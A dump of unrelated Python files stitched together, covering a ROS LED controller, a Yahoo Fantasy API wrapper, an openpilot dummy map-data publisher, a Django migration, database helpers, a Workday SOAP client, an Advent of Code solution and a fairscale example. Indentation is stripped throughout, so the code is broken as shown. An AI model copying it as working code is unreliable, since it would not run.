self.A = np.zeros([self.cropped_height * self.cropped_width, self.n_leds])
self.control = np.array([0.0, 0.0, 0.0, 0.0])
# Set LED's to zero
level = UInt8()
level.data = 0
self.update_leds(level)
# Perform Least Squares Regression and Output new LED Values
def update_leds(self, level):
b = level.data * np.ones(self.cropped_height * self.cropped_width)
if self.A_initialized:
if self.debug:
ver = 2
else:
ver = 0
# solve least squares
sol = optimize.lsq_linear(self.A, b, bounds=(0.0, 1.0), verbose=ver)
if self.debug:
print("Least Squares Solution: ")
print(sol)
x = sol.x
# update led control
self.control = np.array([0.0, 0.0, 0.0, 0.0])
for i in range(len(x)):
self.control[self.led_array[i]] = x[i]
# publish control
msg = Float64MultiArray()
msg.data = self.control
self.led_pub.publish(msg)
# Handle incoming led messages
def led_cb(self, msg):
self.current_state = np.array(msg.data)
self.initialized = True
# Handle incoming images
def image_cb(self, img):
try:
cv_image = self.bridge.imgmsg_to_cv2(img, "bgr8")
except CvBridgeError as e:
print(e)
return  # skip this frame if the conversion failed
hsv = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)
h, s, v = cv2.split(hsv)
# Crop Image
image_horz_center = int(self.image_width / 2.0)
image_vert_center = int(self.image_height / 2.0)
v = v[image_vert_center - int(self.cropped_height / 2.0):image_vert_center + int(
self.cropped_height / 2.0),
image_horz_center - int(self.cropped_width / 2.0):image_horz_center + int(self.cropped_width / 2.0)]
self.last_frame = np.array(v)
# save new response matrix
if self.initialized and sum(self.current_state) == self.pre_flash_value and (sum(self.current_state > 0) == 1):
current_led = self.current_state.nonzero()[0][0]
normalized_response = np.rint(np.array(v) / self.pre_flash_value)
self.responses[current_led] = normalized_response
print("Got New Frame for LED: " + str(current_led))
# save background calibration
if self.initialized and sum(self.current_state) < 1e-6:
self.background = np.array(v)
print("Got New Background Frame")
# Convert the responses to the A matrix.
def calibrate(self, srv):
response_matrices = []
for i in range(len(self.responses)):
if self.responses[i] is not None:
response_matrices.append(self.responses[i] - self.background)
for i in range(len(response_matrices)):
self.A[:, i] = response_matrices[i].flatten()
if len(response_matrices) == self.n_leds:
self.A_initialized = True
return TriggerResponse(True, "Complete A")
elif len(response_matrices) > 0:
return TriggerResponse(True, "Partial A")
else:
return TriggerResponse(False, "Empty A")
# automatically trigger led's and capture mask
def capture_masks(self, srv):
for i in range(self.n_leds):
# activate one LED
self.control = np.array([0.0, 0.0, 0.0, 0.0])
self.control[self.led_array[i]] = self.pre_flash_value
# publish control
msg = Float64MultiArray()
msg.data = self.control
self.led_pub.publish(msg)
# wait for some time for frames to be captured
time.sleep(self.pre_flash_time)
# turn off led's after capture
self.control = np.array([0.0, 0.0, 0.0, 0.0])
msg.data = self.control
self.led_pub.publish(msg)
return self.calibrate(None)
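# A standalone sketch (hypothetical, not part of the node) of the least-squares step used in
# update_leds: each column of A holds one LED's per-pixel response, b is the desired uniform
# brightness, and scipy's lsq_linear finds PWM duty cycles bounded to [0, 1]. The demo function
# and the toy numbers are illustrations only.
def _lsq_demo():
    A = np.array([[1.0, 0.2],
                  [0.3, 1.0],
                  [0.6, 0.6]])  # 3 pixels, 2 LEDs
    b = 0.8 * np.ones(3)        # target brightness per pixel
    sol = optimize.lsq_linear(A, b, bounds=(0.0, 1.0))
    return sol.x                # bounded PWM values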
if __name__ == '__main__':
rospy.init_node("linear_controller")
node = linear_controller()
try:
rospy.spin()
except rospy.ROSInterruptException:
print("Shutting Down.")
cv2.destroyAllWindows()
|
python
|
#!/bin/python
import datetime
YAHOO_ENDPOINT = 'https://fantasysports.yahooapis.com/fantasy/v2'
class YHandler:
"""Class that constructs the APIs to send to Yahoo"""
def __init__(self, sc):
self.sc = sc
def __getattribute__(self, attr):
cred = super(YHandler, self).__getattribute__(attr)
if attr == 'sc':
if not cred.token_is_valid():
cred.refresh_access_token()
# bug in yahoo-auth, does not update session when access token updated
cred.session = cred.oauth.get_session(token=cred.access_token)
return cred
def get(self, uri):
"""Send an API request to the URI and return the response as JSON
:param uri: URI of the API to call
:type uri: str
:return: JSON document of the response
:raises: RuntimeError if any response comes back with an error
"""
response = self.sc.session.get("{}/{}".format(YAHOO_ENDPOINT, uri),
params={'format': 'json'})
if response.status_code != 200:
raise RuntimeError(response.content)
jresp = response.json()
return jresp
def put(self, uri, data):
"""Calls the PUT method to the uri with a payload
:param uri: URI of the API to call
:type uri: str
:param data: What to pass as the payload
:type data: str
:return: XML document of the response
:raises: RuntimeError if any response comes back with an error
"""
headers = {'Content-Type': 'application/xml'}
response = self.sc.session.put("{}/{}".format(YAHOO_ENDPOINT, uri),
data=data, headers=headers)
if response.status_code != 200:
raise RuntimeError(response.content)
return response
def post(self, uri, data):
"""Calls the POST method to the URI with a payload
:param uri: URI of the API to call
:type uri: str
:param data: What to pass as the payload
:type data: str
:return: XML document of the response
:raises: RuntimeError if any response comes back with an error
"""
headers = {'Content-Type': 'application/xml'}
response = self.sc.session.post("{}/{}".format(YAHOO_ENDPOINT, uri),
data=data, headers=headers)
if response.status_code != 201:
raise RuntimeError(response.content)
return response
def get_teams_raw(self):
"""Return the raw JSON when requesting the logged in players teams.
:return: JSON document of the request.
"""
return self.get("users;use_login=1/games/teams")
def get_standings_raw(self, league_id):
"""Return the raw JSON when requesting standings for a league.
:param league_id: League ID to get the standings for
:type league_id: str
:return: JSON document of the request.
"""
return self.get("league/{}/standings".format(league_id))
def get_settings_raw(self, league_id):
"""Return the raw JSON when requesting settings for a league.
:param league_id: League ID to get the standings for
:type league_id: str
:return: JSON document of the request.
"""
return self.get("league/{}/settings".format(league_id))
def get_matchup_raw(self, team_key, week):
"""Return the raw JSON when requesting match-ups for a team
:param team_key: Team key identifier to find the matchups for
:type team_key: str
:param week: What week number to request the matchup for?
:type week: int
:return: JSON of the request
"""
return self.get("team/{}/matchups;weeks={}".format(team_key, week))
def get_roster_raw(self, team_key, week=None, day=None):
"""Return the raw JSON when requesting a team's roster
Can request a roster for a given week or a given day. If neither is
given the current day's roster is returned.
:param team_key: Team key identifier to find the matchups for
:type team_key: str
:param week: What week number to request the roster for?
:type week: int
:param day: What day number to request the roster
:type day: datetime.date
:return: JSON of the request
"""
if week is not None:
param = ";week={}".format(week)
elif day is not None:
param = ";date={}".format(day.strftime("%Y-%m-%d"))
else:
param = ""
return self.get("team/{}/roster{}".format(team_key, param))
def get_scoreboard_raw(self, league_id, week=None):
"""Return the raw JSON when requesting the scoreboard for a week
:param league_id: League ID to get the standings for
:type league_id: str
:param week: The week number to request the scoreboard for
:type week: int
:return: JSON document of the request.
"""
week_uri = ""
if week is not None:
week_uri = ";week={}".format(week)
return self.get("league/{}/scoreboard{}".format(league_id, week_uri))
def get_players_raw(self, league_id, start, status, position=None, sub_resource='percent_owned'):
"""Return the raw JSON when requesting players in the league
The result is limited to 25 players.
:param league_id: League ID to get the players for
:type league_id: str
:param start: The output is paged at 25 players each time. Use this
parameter for subsequent calls to get the players at the next page.
For example, you specify 0 for the first call, 25 for the second call,
etc.
:type start: int
:param status: A filter to limit the player status. Available values
are: 'A' - all available; 'FA' - free agents; 'W' - waivers, 'T' -
taken players, 'K' - keepers
:type status: str
:param position: A filter to return players only for a specific
position. If None is passed, then no position filtering occurs.
:type position: str
:return: JSON document of the request.
"""
if position is None:
pos_parm = ""
else:
pos_parm = ";position={}".format(position)
return self.get(
"league/{}/players;start={};count=25;status={}{}{}".
format(league_id, start, status, pos_parm, '/' + sub_resource))
def get_player_raw(self, league_id, player_name):
"""Return the raw JSON when requesting player details
:param league_id: League ID to get the player for
:type league_id: str
:param player_name: Name of player to get the details for
:type player_name: str
:return: JSON document of the request.
"""
player_stat_uri = ""
if player_name is not None:
player_stat_uri = "players;search={}/stats".format(player_name)
return self.get("league/{}/{}".format(league_id, player_stat_uri))
def get_percent_owned_raw(self, league_id, player_ids):
"""Return the raw JSON when requesting the percentage owned of players
:param league_id: League ID we are requesting data from
:type league_id: str
:param player_ids: Yahoo! Player IDs to retrieve % owned for
:type player_ids: list(str)
:return: JSON document of the request
"""
lg_pref = league_id[0:league_id.find(".")]
joined_ids = ",".join([lg_pref + ".p." + str(i) for i in player_ids])
return self.get(
"league/{}/players;player_keys={}/percent_owned".
format(league_id, joined_ids))
def put_roster(self, team_key, xml):
"""Calls PUT against the roster API passing it an xml document
:param team_key: The key of the team the roster move applies too
:type team_key: str
:param xml: The XML document to send
:type xml: str
:return: Response from the PUT
"""
return self.put("team/{}/roster".format(team_key), xml)
def post_transactions(self, league_id, xml):
"""Calls POST against the transaction API passing it an xml document
:param league_id: The league ID that the API request applies to
:type league_id: str
:param xml: The XML document to send as the payload
:type xml: str
:return: Response from the POST
"""
return self.post("league/{}/transactions".format(league_id), xml)
def get_team_transactions(self, league_id, team_key, tran_type):
"""
Calls GET to retrieve transactions for a team of a given type.
:param league_id: The league ID that the API request applies to
:type league_id: str
:param team_key: The key of the team the roster move applies too
:type team_key: str
:param tran_type: The type of transaction to retrieve. Valid values
are: waiver or pending_trade
:return: Response from the GET
"""
return self.get(
"league/{}/transactions;team_key={};type={}".format(
league_id, team_key, tran_type))
def put_transaction(self, transaction_key, xml):
"""
PUT to the transaction API
This can be used to accept/reject trades, voting for/against a trade,
and editing a waiver claim.
:param xml: The XML document to send
:type xml: str
:return: Response from the PUT
"""
return self.put("transaction/" + str(transaction_key), xml)
def get_player_stats_raw(self, game_code, player_ids, req_type, date,
season):
"""
GET stats for a list of player IDs
:param game_code: The game code the players belong too. mlb, nhl, etc.
:type game_code: str
:param player_ids: Yahoo! player IDs we are requesting stats for
:type player_ids: list(int)
:param req_type: The request type. This defines the range of dates to
return the stats for.
:param date: When req_type == 'date', this is the date we want the
stats for. If None, we'll get the stats for the current date.
:type date: datetime.date
:param season: When req_type == 'season', this is the season we want
the stats for. If None, we'll get the stats for the current season
:type season: int
:return: Response from the GET call
"""
uri = self._build_player_stats_uri(game_code, player_ids, req_type,
date, season)
return self.get(uri)
def _build_player_stats_uri(self, game_code, player_ids, req_type, date,
season):
uri = 'players;player_keys='
if type(player_ids) is list:
for i, p in enumerate(player_ids):
if i != 0:
uri += ","
uri += "{}.p.{}".format(game_code, p)
uri += "/stats;{}".format(self._get_stats_type(req_type, date, season))
return uri
def _get_stats_type(self, req_type, date, season):
if req_type == 'season':
if season is None:
return "type=season"
else:
return "type=season;season={}".format(season)
elif req_type == 'date':
if date is None:
date = datetime.date.today()
if type(date) is datetime.date or type(date) is datetime.datetime:
return "type=date;date={}".format(date.strftime("%Y-%m-%d"))
else:
return "type=date;date={}".format(date)
elif req_type in ['lastweek', 'lastmonth']:
return "type={}".format(req_type)
else:
assert(False), "Unknown req_type type: {}".format(req_type)
def get_standings_raw(self, league_id, week=None):
"""Return the raw JSON when requesting the scoreboard for a week
:param league_id: League ID to get the standings for
:type league_id: str
:param week: The week number to request the standings for
:type week: int
:return: JSON document of the request.
"""
week_uri = ""
if week is not None:
week_uri = ";week={}".format(week)
return self.get("league/{}/standings{}".format(league_id, week_uri))
def get_transactions(self, league_id):
"""Return the raw JSON when requesting the scoreboard for a week
:param league_id: League ID to get the standings for
:type league_id: str
:param week: The week number to request the scoreboard for
:type week: int
:return: JSON document of the request.
"""
return self.get("league/{}/transactions".format(league_id))
def get_draft_results(self, league_id):
# /fantasy/v2/league/{league_key}/draftresults
return self.get("league/{}/draftresults".format(league_id))
|
python
|
#!/usr/bin/env python3
import os
import time
import math
import atexit
import numpy as np
import threading
import random
import cereal.messaging as messaging
import argparse
from common.params import Params
from common.realtime import Ratekeeper
import queue
import requests
import cereal.messaging.messaging_pyx as messaging_pyx
import datetime
import json
def main():
rk = Ratekeeper(5.0, print_delay_threshold=None)
pm = messaging.PubMaster(['liveMapData'])
while 1:
time.sleep(1)
speed_limit = 60.0
has_exit = True
dist_to_next_step = 1000.0
remain_dist = 2500.0
nav_icon = 2
dat = messaging.new_message('liveMapData')
dat.valid = True
# struct LiveMapData {
# speedLimitValid @0 :Bool;
# speedLimit @1 :Float32;
# speedAdvisoryValid @12 :Bool;
# speedAdvisory @13 :Float32;
# speedLimitAheadValid @14 :Bool;
# speedLimitAhead @15 :Float32;
# speedLimitAheadDistance @16 :Float32;
# curvatureValid @2 :Bool;
# curvature @3 :Float32;
# wayId @4 :UInt64;
# roadX @5 :List(Float32);
# roadY @6 :List(Float32);
# lastGps @7: GpsLocationData;
# roadCurvatureX @8 :List(Float32);
# roadCurvature @9 :List(Float32);
# distToTurn @10 :Float32;
# mapValid @11 :Bool;
# }
live_map_data = dat.liveMapData
live_map_data.speedLimit = speed_limit * 1.08
live_map_data.distToTurn = dist_to_next_step
live_map_data.speedAdvisoryValid = has_exit
live_map_data.speedAdvisory = remain_dist
live_map_data.wayId = nav_icon
pm.send('liveMapData', dat)
#sm.update()
rk.keep_time()
if __name__ == "__main__":
main()
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Badge',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('name', models.CharField(max_length=150)),
('slug', models.CharField(max_length=150)),
('priority', models.IntegerField(default=1)),
],
),
migrations.CreateModel(
name='Offer',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('description', models.TextField()),
('requirements', models.TextField()),
('time_commitment', models.TextField()),
('benefits', models.TextField()),
('location', models.CharField(max_length=150)),
('title', models.CharField(max_length=150)),
('started_at', models.DateTimeField(blank=True, null=True)),
('finished_at', models.DateTimeField(blank=True, null=True)),
('time_period', models.CharField(blank=True, default='', max_length=150)),
('status_old', models.CharField(default='NEW', max_length=30, null=True)),
('offer_status', models.CharField(default='unpublished', choices=[('unpublished', 'Unpublished'), ('published', 'Published'), ('rejected', 'Rejected')], max_length=16)),
('recruitment_status', models.CharField(default='open', choices=[('open', 'Open'), ('supplemental', 'Supplemental'), ('closed', 'Closed')], max_length=16)),
('action_status', models.CharField(default='ongoing', choices=[('future', 'Future'), ('ongoing', 'Ongoing'), ('finished', 'Finished')], max_length=16)),
('votes', models.BooleanField(default=0)),
('recruitment_start_date', models.DateTimeField(blank=True, null=True)),
('recruitment_end_date', models.DateTimeField(blank=True, null=True)),
('reserve_recruitment', models.BooleanField(default=True)),
('reserve_recruitment_start_date', models.DateTimeField(blank=True, null=True)),
('reserve_recruitment_end_date', models.DateTimeField(blank=True, null=True)),
('action_ongoing', models.BooleanField(default=False)),
('constant_coop', models.BooleanField(default=False)),
('action_start_date', models.DateTimeField(blank=True, null=True)),
('action_end_date', models.DateTimeField(blank=True, null=True)),
('volunteers_limit', models.IntegerField(blank=True, default=0, null=True)),
],
),
migrations.CreateModel(
name='OfferImage',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('path', models.ImageField(upload_to='offers/')),
('is_main', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('offer', models.ForeignKey(to='volontulo.Offer')),
],
),
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('name', models.CharField(max_length=150)),
('address', models.CharField(max_length=150)),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='OrganizationGallery',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('path', models.ImageField(upload_to='gallery/')),
('is_main', models.BooleanField(default=False)),
('organization', models.ForeignKey(to='volontulo.Organization', related_name='images')),
],
),
migrations.CreateModel(
name='UserBadges',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('description', models.CharField(max_length=255)),
('counter', models.IntegerField(blank=True, default=0)),
('badge', models.ForeignKey(to='volontulo.Badge')),
('content_type', models.ForeignKey(null=True, to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='UserGallery',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('image', models.ImageField(upload_to='profile/')),
('is_avatar', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('is_administrator', models.BooleanField(default=False)),
('uuid', models.UUIDField(default=uuid.uuid4, unique=True)),
('badges', models.ManyToManyField(to='volontulo.Badge', through='volontulo.UserBadges', related_name='user_profile')),
('organizations', models.ManyToManyField(to='volontulo.Organization', related_name='userprofiles')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='usergallery',
name='userprofile',
field=models.ForeignKey(to='volontulo.UserProfile', related_name='images'),
),
migrations.AddField(
model_name='userbadges',
name='userprofile',
field=models.ForeignKey(to='volontulo.UserProfile', db_column='userprofile_id'),
),
migrations.AddField(
model_name='organizationgallery',
name='published_by',
field=models.ForeignKey(to='volontulo.UserProfile', related_name='gallery'),
),
migrations.AddField(
model_name='offerimage',
name='userprofile',
field=models.ForeignKey(to='volontulo.UserProfile', related_name='offerimages'),
),
migrations.AddField(
model_name='offer',
name='organization',
field=models.ForeignKey(to='volontulo.Organization'),
),
migrations.AddField(
model_name='offer',
name='volunteers',
field=models.ManyToManyField(to=settings.AUTH_USER_MODEL),
),
]
|
python
|
"""
Copyright [2009-2019] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sqlalchemy as sa
import psycopg2
from . import DatabaseConnectionError, SQLError
from .models import InfernalResult
async def set_infernal_job_results(engine, job_id, results):
"""
Save infernal results
:param engine: params to connect to the db
:param job_id: id of the job
:param results: data from the deoverlapped file
:return: id of the infernal_job. It will be used to get the result and save the alignment
"""
try:
async with engine.acquire() as connection:
try:
query = sa.text('''
SELECT id
FROM infernal_job
WHERE job_id=:job_id
''')
infernal_job_id = None
async for row in await connection.execute(query, job_id=job_id):
infernal_job_id = row.id
break
for result in results:
result['infernal_job_id'] = infernal_job_id
await connection.execute(InfernalResult.insert().values(results))
return infernal_job_id
except Exception as e:
raise SQLError("Failed to set_infernal_job_results in the database, "
"job_id = %s" % job_id) from e
except psycopg2.Error as e:
raise DatabaseConnectionError("Failed to open connection to the database in set_infernal_job_results, "
"job_id = %s" % job_id) from e
async def get_infernal_result_id(engine, infernal_job_id, item):
"""
Get infernal_result id
:param engine: params to connect to the db
:param infernal_job_id: id of the infernal_job
:param item: dict with values to find the id of the infernal_result
:return: id of the infernal_result
"""
try:
async with engine.acquire() as connection:
try:
query = sa.text('''
SELECT id
FROM infernal_result
WHERE infernal_job_id=:infernal_job_id AND accession_rfam=:accession_rfam AND mdl_from=:mdl_from
AND mdl_to=:mdl_to AND seq_from=:seq_from AND seq_to=:seq_to AND gc=:gc AND score=:score
AND e_value=:e_value
''')
infernal_result_id = None
async for row in await connection.execute(
query, infernal_job_id=infernal_job_id, accession_rfam=item['accession_rfam'],
mdl_from=item['mdl_from'], mdl_to=item['mdl_to'], seq_from=item['seq_from'],
seq_to=item['seq_to'], gc=item['gc'], score=item['score'], e_value=item['e_value']):
infernal_result_id = row.id
break
return infernal_result_id
except Exception as e:
raise SQLError("Failed to get_infernal_result_id in the database, "
"infernal_job_id = %s" % infernal_job_id) from e
except psycopg2.Error as e:
raise DatabaseConnectionError("Failed to open connection to the database in get_infernal_result_id, "
"infernal_job_id = %s" % infernal_job_id) from e
async def save_alignment(engine, infernal_result_id, alignment):
"""
Save the alignment
:param engine: params to connect to the db
:param infernal_result_id: id of the infernal_result
:param alignment: alignment to be saved
"""
try:
async with engine.acquire() as connection:
try:
query = sa.text('''
UPDATE infernal_result SET alignment=:alignment
WHERE id=:infernal_result_id
''')
await connection.execute(query, alignment=alignment, infernal_result_id=infernal_result_id)
except Exception as e:
raise SQLError("Failed to save_alignment in the database, "
"infernal_result_id = %s" % infernal_result_id) from e
except psycopg2.Error as e:
raise DatabaseConnectionError("Failed to open connection to the database in save_alignment, "
"infernal_result_id = %s" % infernal_result_id) from e
|
python
|
# -*- coding: utf-8 -*-
# Licensed to Anthony Shaw ([email protected]) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import zeep
import zeep.exceptions
import zeep.transports
from .exceptions import WorkdaySoapApiError
class WorkdayResponse(object):
"""
Response from the Workday API
"""
def __init__(self, response, service, method, called_args, called_kwargs):
"""
:param response: The response from the API
:type response: ``dict``
:param service: The web service that was called
:type service: :class:`zeep.proxy.ServiceProxy`
:param method: The name of the web method called
:type method: ``str``
:param called_args: The arguments that were used to call the method
:type called_args: ``list``
:param called_kwargs: The keyword-arguments that were used to call the method
:type called_kwargs: ``dict``
"""
self.service = service
self.method = method
self.called_args = called_args
self.called_kwargs = called_kwargs
self._response = response
def __iter__(self):
return self
def __next__(self):
"""
Use the iterator protocol as a way of returning paged
result sets
"""
if self.page == self.total_pages:
raise StopIteration
else:
# Add paging params if not already existing
if "Response_Filter" not in self.called_kwargs:
self.called_kwargs["Response_Filter"] = {"Page": self.page + 1}
else:
if "Page" in self.called_kwargs["Response_Filter"]:
self.called_kwargs["Response_Filter"]["Page"] += 1
else:
self.called_kwargs["Response_Filter"]["Page"] = self.page + 1
result = getattr(self.service, self.method)(
*self.called_args, **self.called_kwargs
)
self._response = result
return WorkdayResponse(
result,
service=self.service,
method=self.method,
called_args=self.called_args,
called_kwargs=self.called_kwargs,
)
def next(self):
return self.__next__()
@property
def references(self):
return self._response.get("Request_References", None)
@property
def filter(self):
return self._response.get("Response_Filter", None)
@property
def total_results(self):
# For some reason, Response_Results can be a list for some APIs,
# so we index into the list if we have to
if isinstance(self._response["Response_Results"], list):
return int(self._response["Response_Results"][0]["Total_Results"])
return int(self._response["Response_Results"]["Total_Results"])
@property
def total_pages(self):
return int(self._response["Response_Results"]["Total_Pages"])
@property
def page_results(self):
return int(self._response["Response_Results"]["Page_Results"])
@property
def page(self):
return int(self._response["Response_Results"]["Page"])
@property
def data(self):
return self._response["Response_Data"]
class BaseSoapApiClient(object):
def __init__(self, name, session, wsdl_url, authentication, proxy_url=None, strict=True):
"""
:param name: Name of this API
:type name: ``str``
:param session: HTTP session to use for communication
:type session: :class:`requests.Session`
:param wsdl_url: Path to the WSDL
:type wsdl_url: ``str``
:param authentication: Authentication configuration
:type authentication: :class:`workday.auth.BaseAuthentication`
:param proxy_url: (Optional) HTTP Proxy URL
:type proxy_url: ``str``
"""
auth_kwargs = authentication.kwargs
settings = zeep.Settings(strict=strict)
self._client = zeep.Client(
wsdl=wsdl_url,
transport=zeep.transports.Transport(session=session),
settings=settings,
**auth_kwargs
)
def __getattr__(self, attr):
"""
Wrapper around the SOAP client service methods.
Converts responses to a :class:`WorkdayResponse` instance
:rtype: :class:`WorkdayResponse`
"""
def call_soap_method(*args, **kwargs):
try:
result = getattr(self._client.service, attr)(*args, **kwargs)
return WorkdayResponse(
result,
service=self._client.service,
method=attr,
called_args=args,
called_kwargs=kwargs,
)
except zeep.exceptions.Fault as fault:
raise WorkdaySoapApiError(fault)
return call_soap_method
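# A hypothetical paging sketch (the client construction details and the method name depend on the
# Workday WSDL and credentials in use, so treat them as placeholders): every call made through
# __getattr__ returns a WorkdayResponse, and iterating a response re-issues the request with
# Response_Filter.Page advanced until total_pages is reached, yielding the remaining pages.
#
#   client = BaseSoapApiClient('hr', session, wsdl_url, authentication)
#   first = client.Get_Workers(Response_Filter={'Page': 1})
#   pages = [first] + list(first)  # iteration fetches pages 2..total_pages
#   for page in pages:
#       process(page.data)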
|
python
|
from datetime import datetime
from caselawclient.Client import api_client
from requests_toolbelt.multipart import decoder
from .models import SearchResults
def format_date(date):
if date == "" or date is None:
return None
time = datetime.strptime(date, "%Y-%m-%d")
return time.strftime("%d-%m-%Y")
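# Illustrative example (not from the original source): format_date("2023-01-31") returns
# "31-01-2023", while format_date("") and format_date(None) both return None.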
def perform_advanced_search(
query=None,
court=None,
judge=None,
party=None,
order=None,
neutral_citation=None,
specific_keyword=None,
date_from=None,
date_to=None,
page=1,
):
response = api_client.advanced_search(
q=query,
court=court,
judge=judge,
party=party,
neutral_citation=neutral_citation,
specific_keyword=specific_keyword,
page=page,
order=order,
date_from=date_from,
date_to=date_to,
)
multipart_data = decoder.MultipartDecoder.from_response(response)
return SearchResults.create_from_string(multipart_data.parts[0].text)
|
python
|
""" https://adventofcode.com/2018/day/6 """
def readFile():
with open(f"{__file__.rstrip('code.py')}input.txt", "r") as f:
lines = [line[:-1].split(", ") for line in f.readlines()]
return [Point(int(line[0]), int(line[1])) for line in lines]
class Point:
n = 0
def __init__(self, x, y):
self.x = x
self.y = y
self.name = str(Point.n).zfill(3)
Point.n += 1
self.coords = (x, y)
self.isInfinite = False
def getDistance(self, x, y):
return abs(self.x - x) + abs(self.y - y)
def getMinimumOfDict(data : dict):
minVal = None
minID = None
for d in data:
if minVal is None or data[d] < minVal:
minVal = data[d]
minID = d
return minVal, minID
def part1(vals):
x, y = [val.x for val in vals], [val.y for val in vals]
minx, maxx, miny, maxy = min(x), max(x), min(y), max(y)
field = []
for y in range(miny, maxy + 1):
field.append([-1 for x in range(minx, maxx + 1)])
for y in range(miny, maxy + 1):
for x in range(minx, maxx + 1):
dist = {}
for val in vals:
dist[val.name] = val.getDistance(x, y)
minDist, point = getMinimumOfDict(dist)
if sum(value == minDist for value in dist.values()) == 1:
field[y-miny][x-minx] = point
points = {}
for y in range(miny, maxy + 1):
for x in range(minx, maxx + 1):
id = field[y-miny][x-minx]
if id == -1:
continue
if id in points:
points[id]["value"] += 1
if not points[id]["border"]:
points[id]["border"] = x == minx or x == maxx or y == miny or y == maxy
else:
points[id] = {
"value": 1,
"border": x == minx or x == maxx or y == miny or y == maxy
}
result = -1
for point in points:
if points[point]["border"]:
continue
if points[point]["value"] > result:
result = points[point]["value"]
return result
class Location:
maxDist = 0
def __init__(self, x, y):
self.distance = 0
self.x = x
self.y = y
self.inRegion = True
def addDistance(self, point):
self.distance += point.getDistance(self.x, self.y)
if self.distance >= Location.maxDist:
self.inRegion = False
def part2(vals, maxDist):
x, y = [val.x for val in vals], [val.y for val in vals]
minx, maxx, miny, maxy = min(x), max(x), min(y), max(y)
Location.maxDist = maxDist
locations = []
for j in range(miny, maxy + 1):
for i in range(minx, maxx + 1):
loc = Location(i, j)
for point in vals:
loc.addDistance(point)
locations.append(loc)
count = 0
for loc in locations:
if loc.inRegion:
count += 1
return count
if __name__ == "__main__":
vals, maxDist = readFile(), 10000
#vals, maxDist = [Point(1, 1), Point(1, 6), Point(8, 3), Point(3, 4),
# Point(5, 5), Point(8, 9)], 32
print(f"Part 1: {part1(vals)}")
print(f"Part 2: {part2(vals, maxDist)}")
|
python
|
import os
from helpers import dist_init, getData, getLossFun, getModel
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.optim as optim
import fairscale
from fairscale.nn.model_parallel import initialize_model_parallel
DEVICE = "cuda" if torch.cuda.is_available() else "cpu"
RANK = 0 # example
def run(rank, world_size):
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "10638"
dist_init(rank, world_size)
os.environ["MASTER_PORT"] = "10639"
dist.rpc.init_rpc(f"worker{rank}", rank=rank, world_size=world_size)
initialize_model_parallel(1, world_size)
model = getModel()
data, target = getData()[0]
loss_fn = getLossFun()
device = torch.device("cuda", RANK) if DEVICE == "cuda" else torch.device("cpu")
model = fairscale.nn.Pipe(
model,
balance=[2, 1],
style=fairscale.nn.Pipe.MultiProcess,
worker_map={0: "worker0", 1: "worker1"}, # Needed to convert ranks to RPC worker names
input_device=device,
).to(device)
# define optimizer and loss function
optimizer = optim.SGD(model.parameters(), lr=0.001)
# zero the parameter gradients
optimizer.zero_grad()
# outputs and target need to be on the same device
# forward step
outputs = model(data.to(device))
# compute loss
if rank == 1:
loss = loss_fn(outputs.to(device), target.to(device))
# backward + optimize
loss.backward()
optimizer.step()
else:
model.back_helper(outputs)
print(f"Finished Training Step on {rank}")
del model
if __name__ == "__main__":
world_size = 2
mp.spawn(run, args=(world_size,), nprocs=world_size, join=True)
|
python
|
###############################################################################
# Copyright (c) 2021, Milan Neubert ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
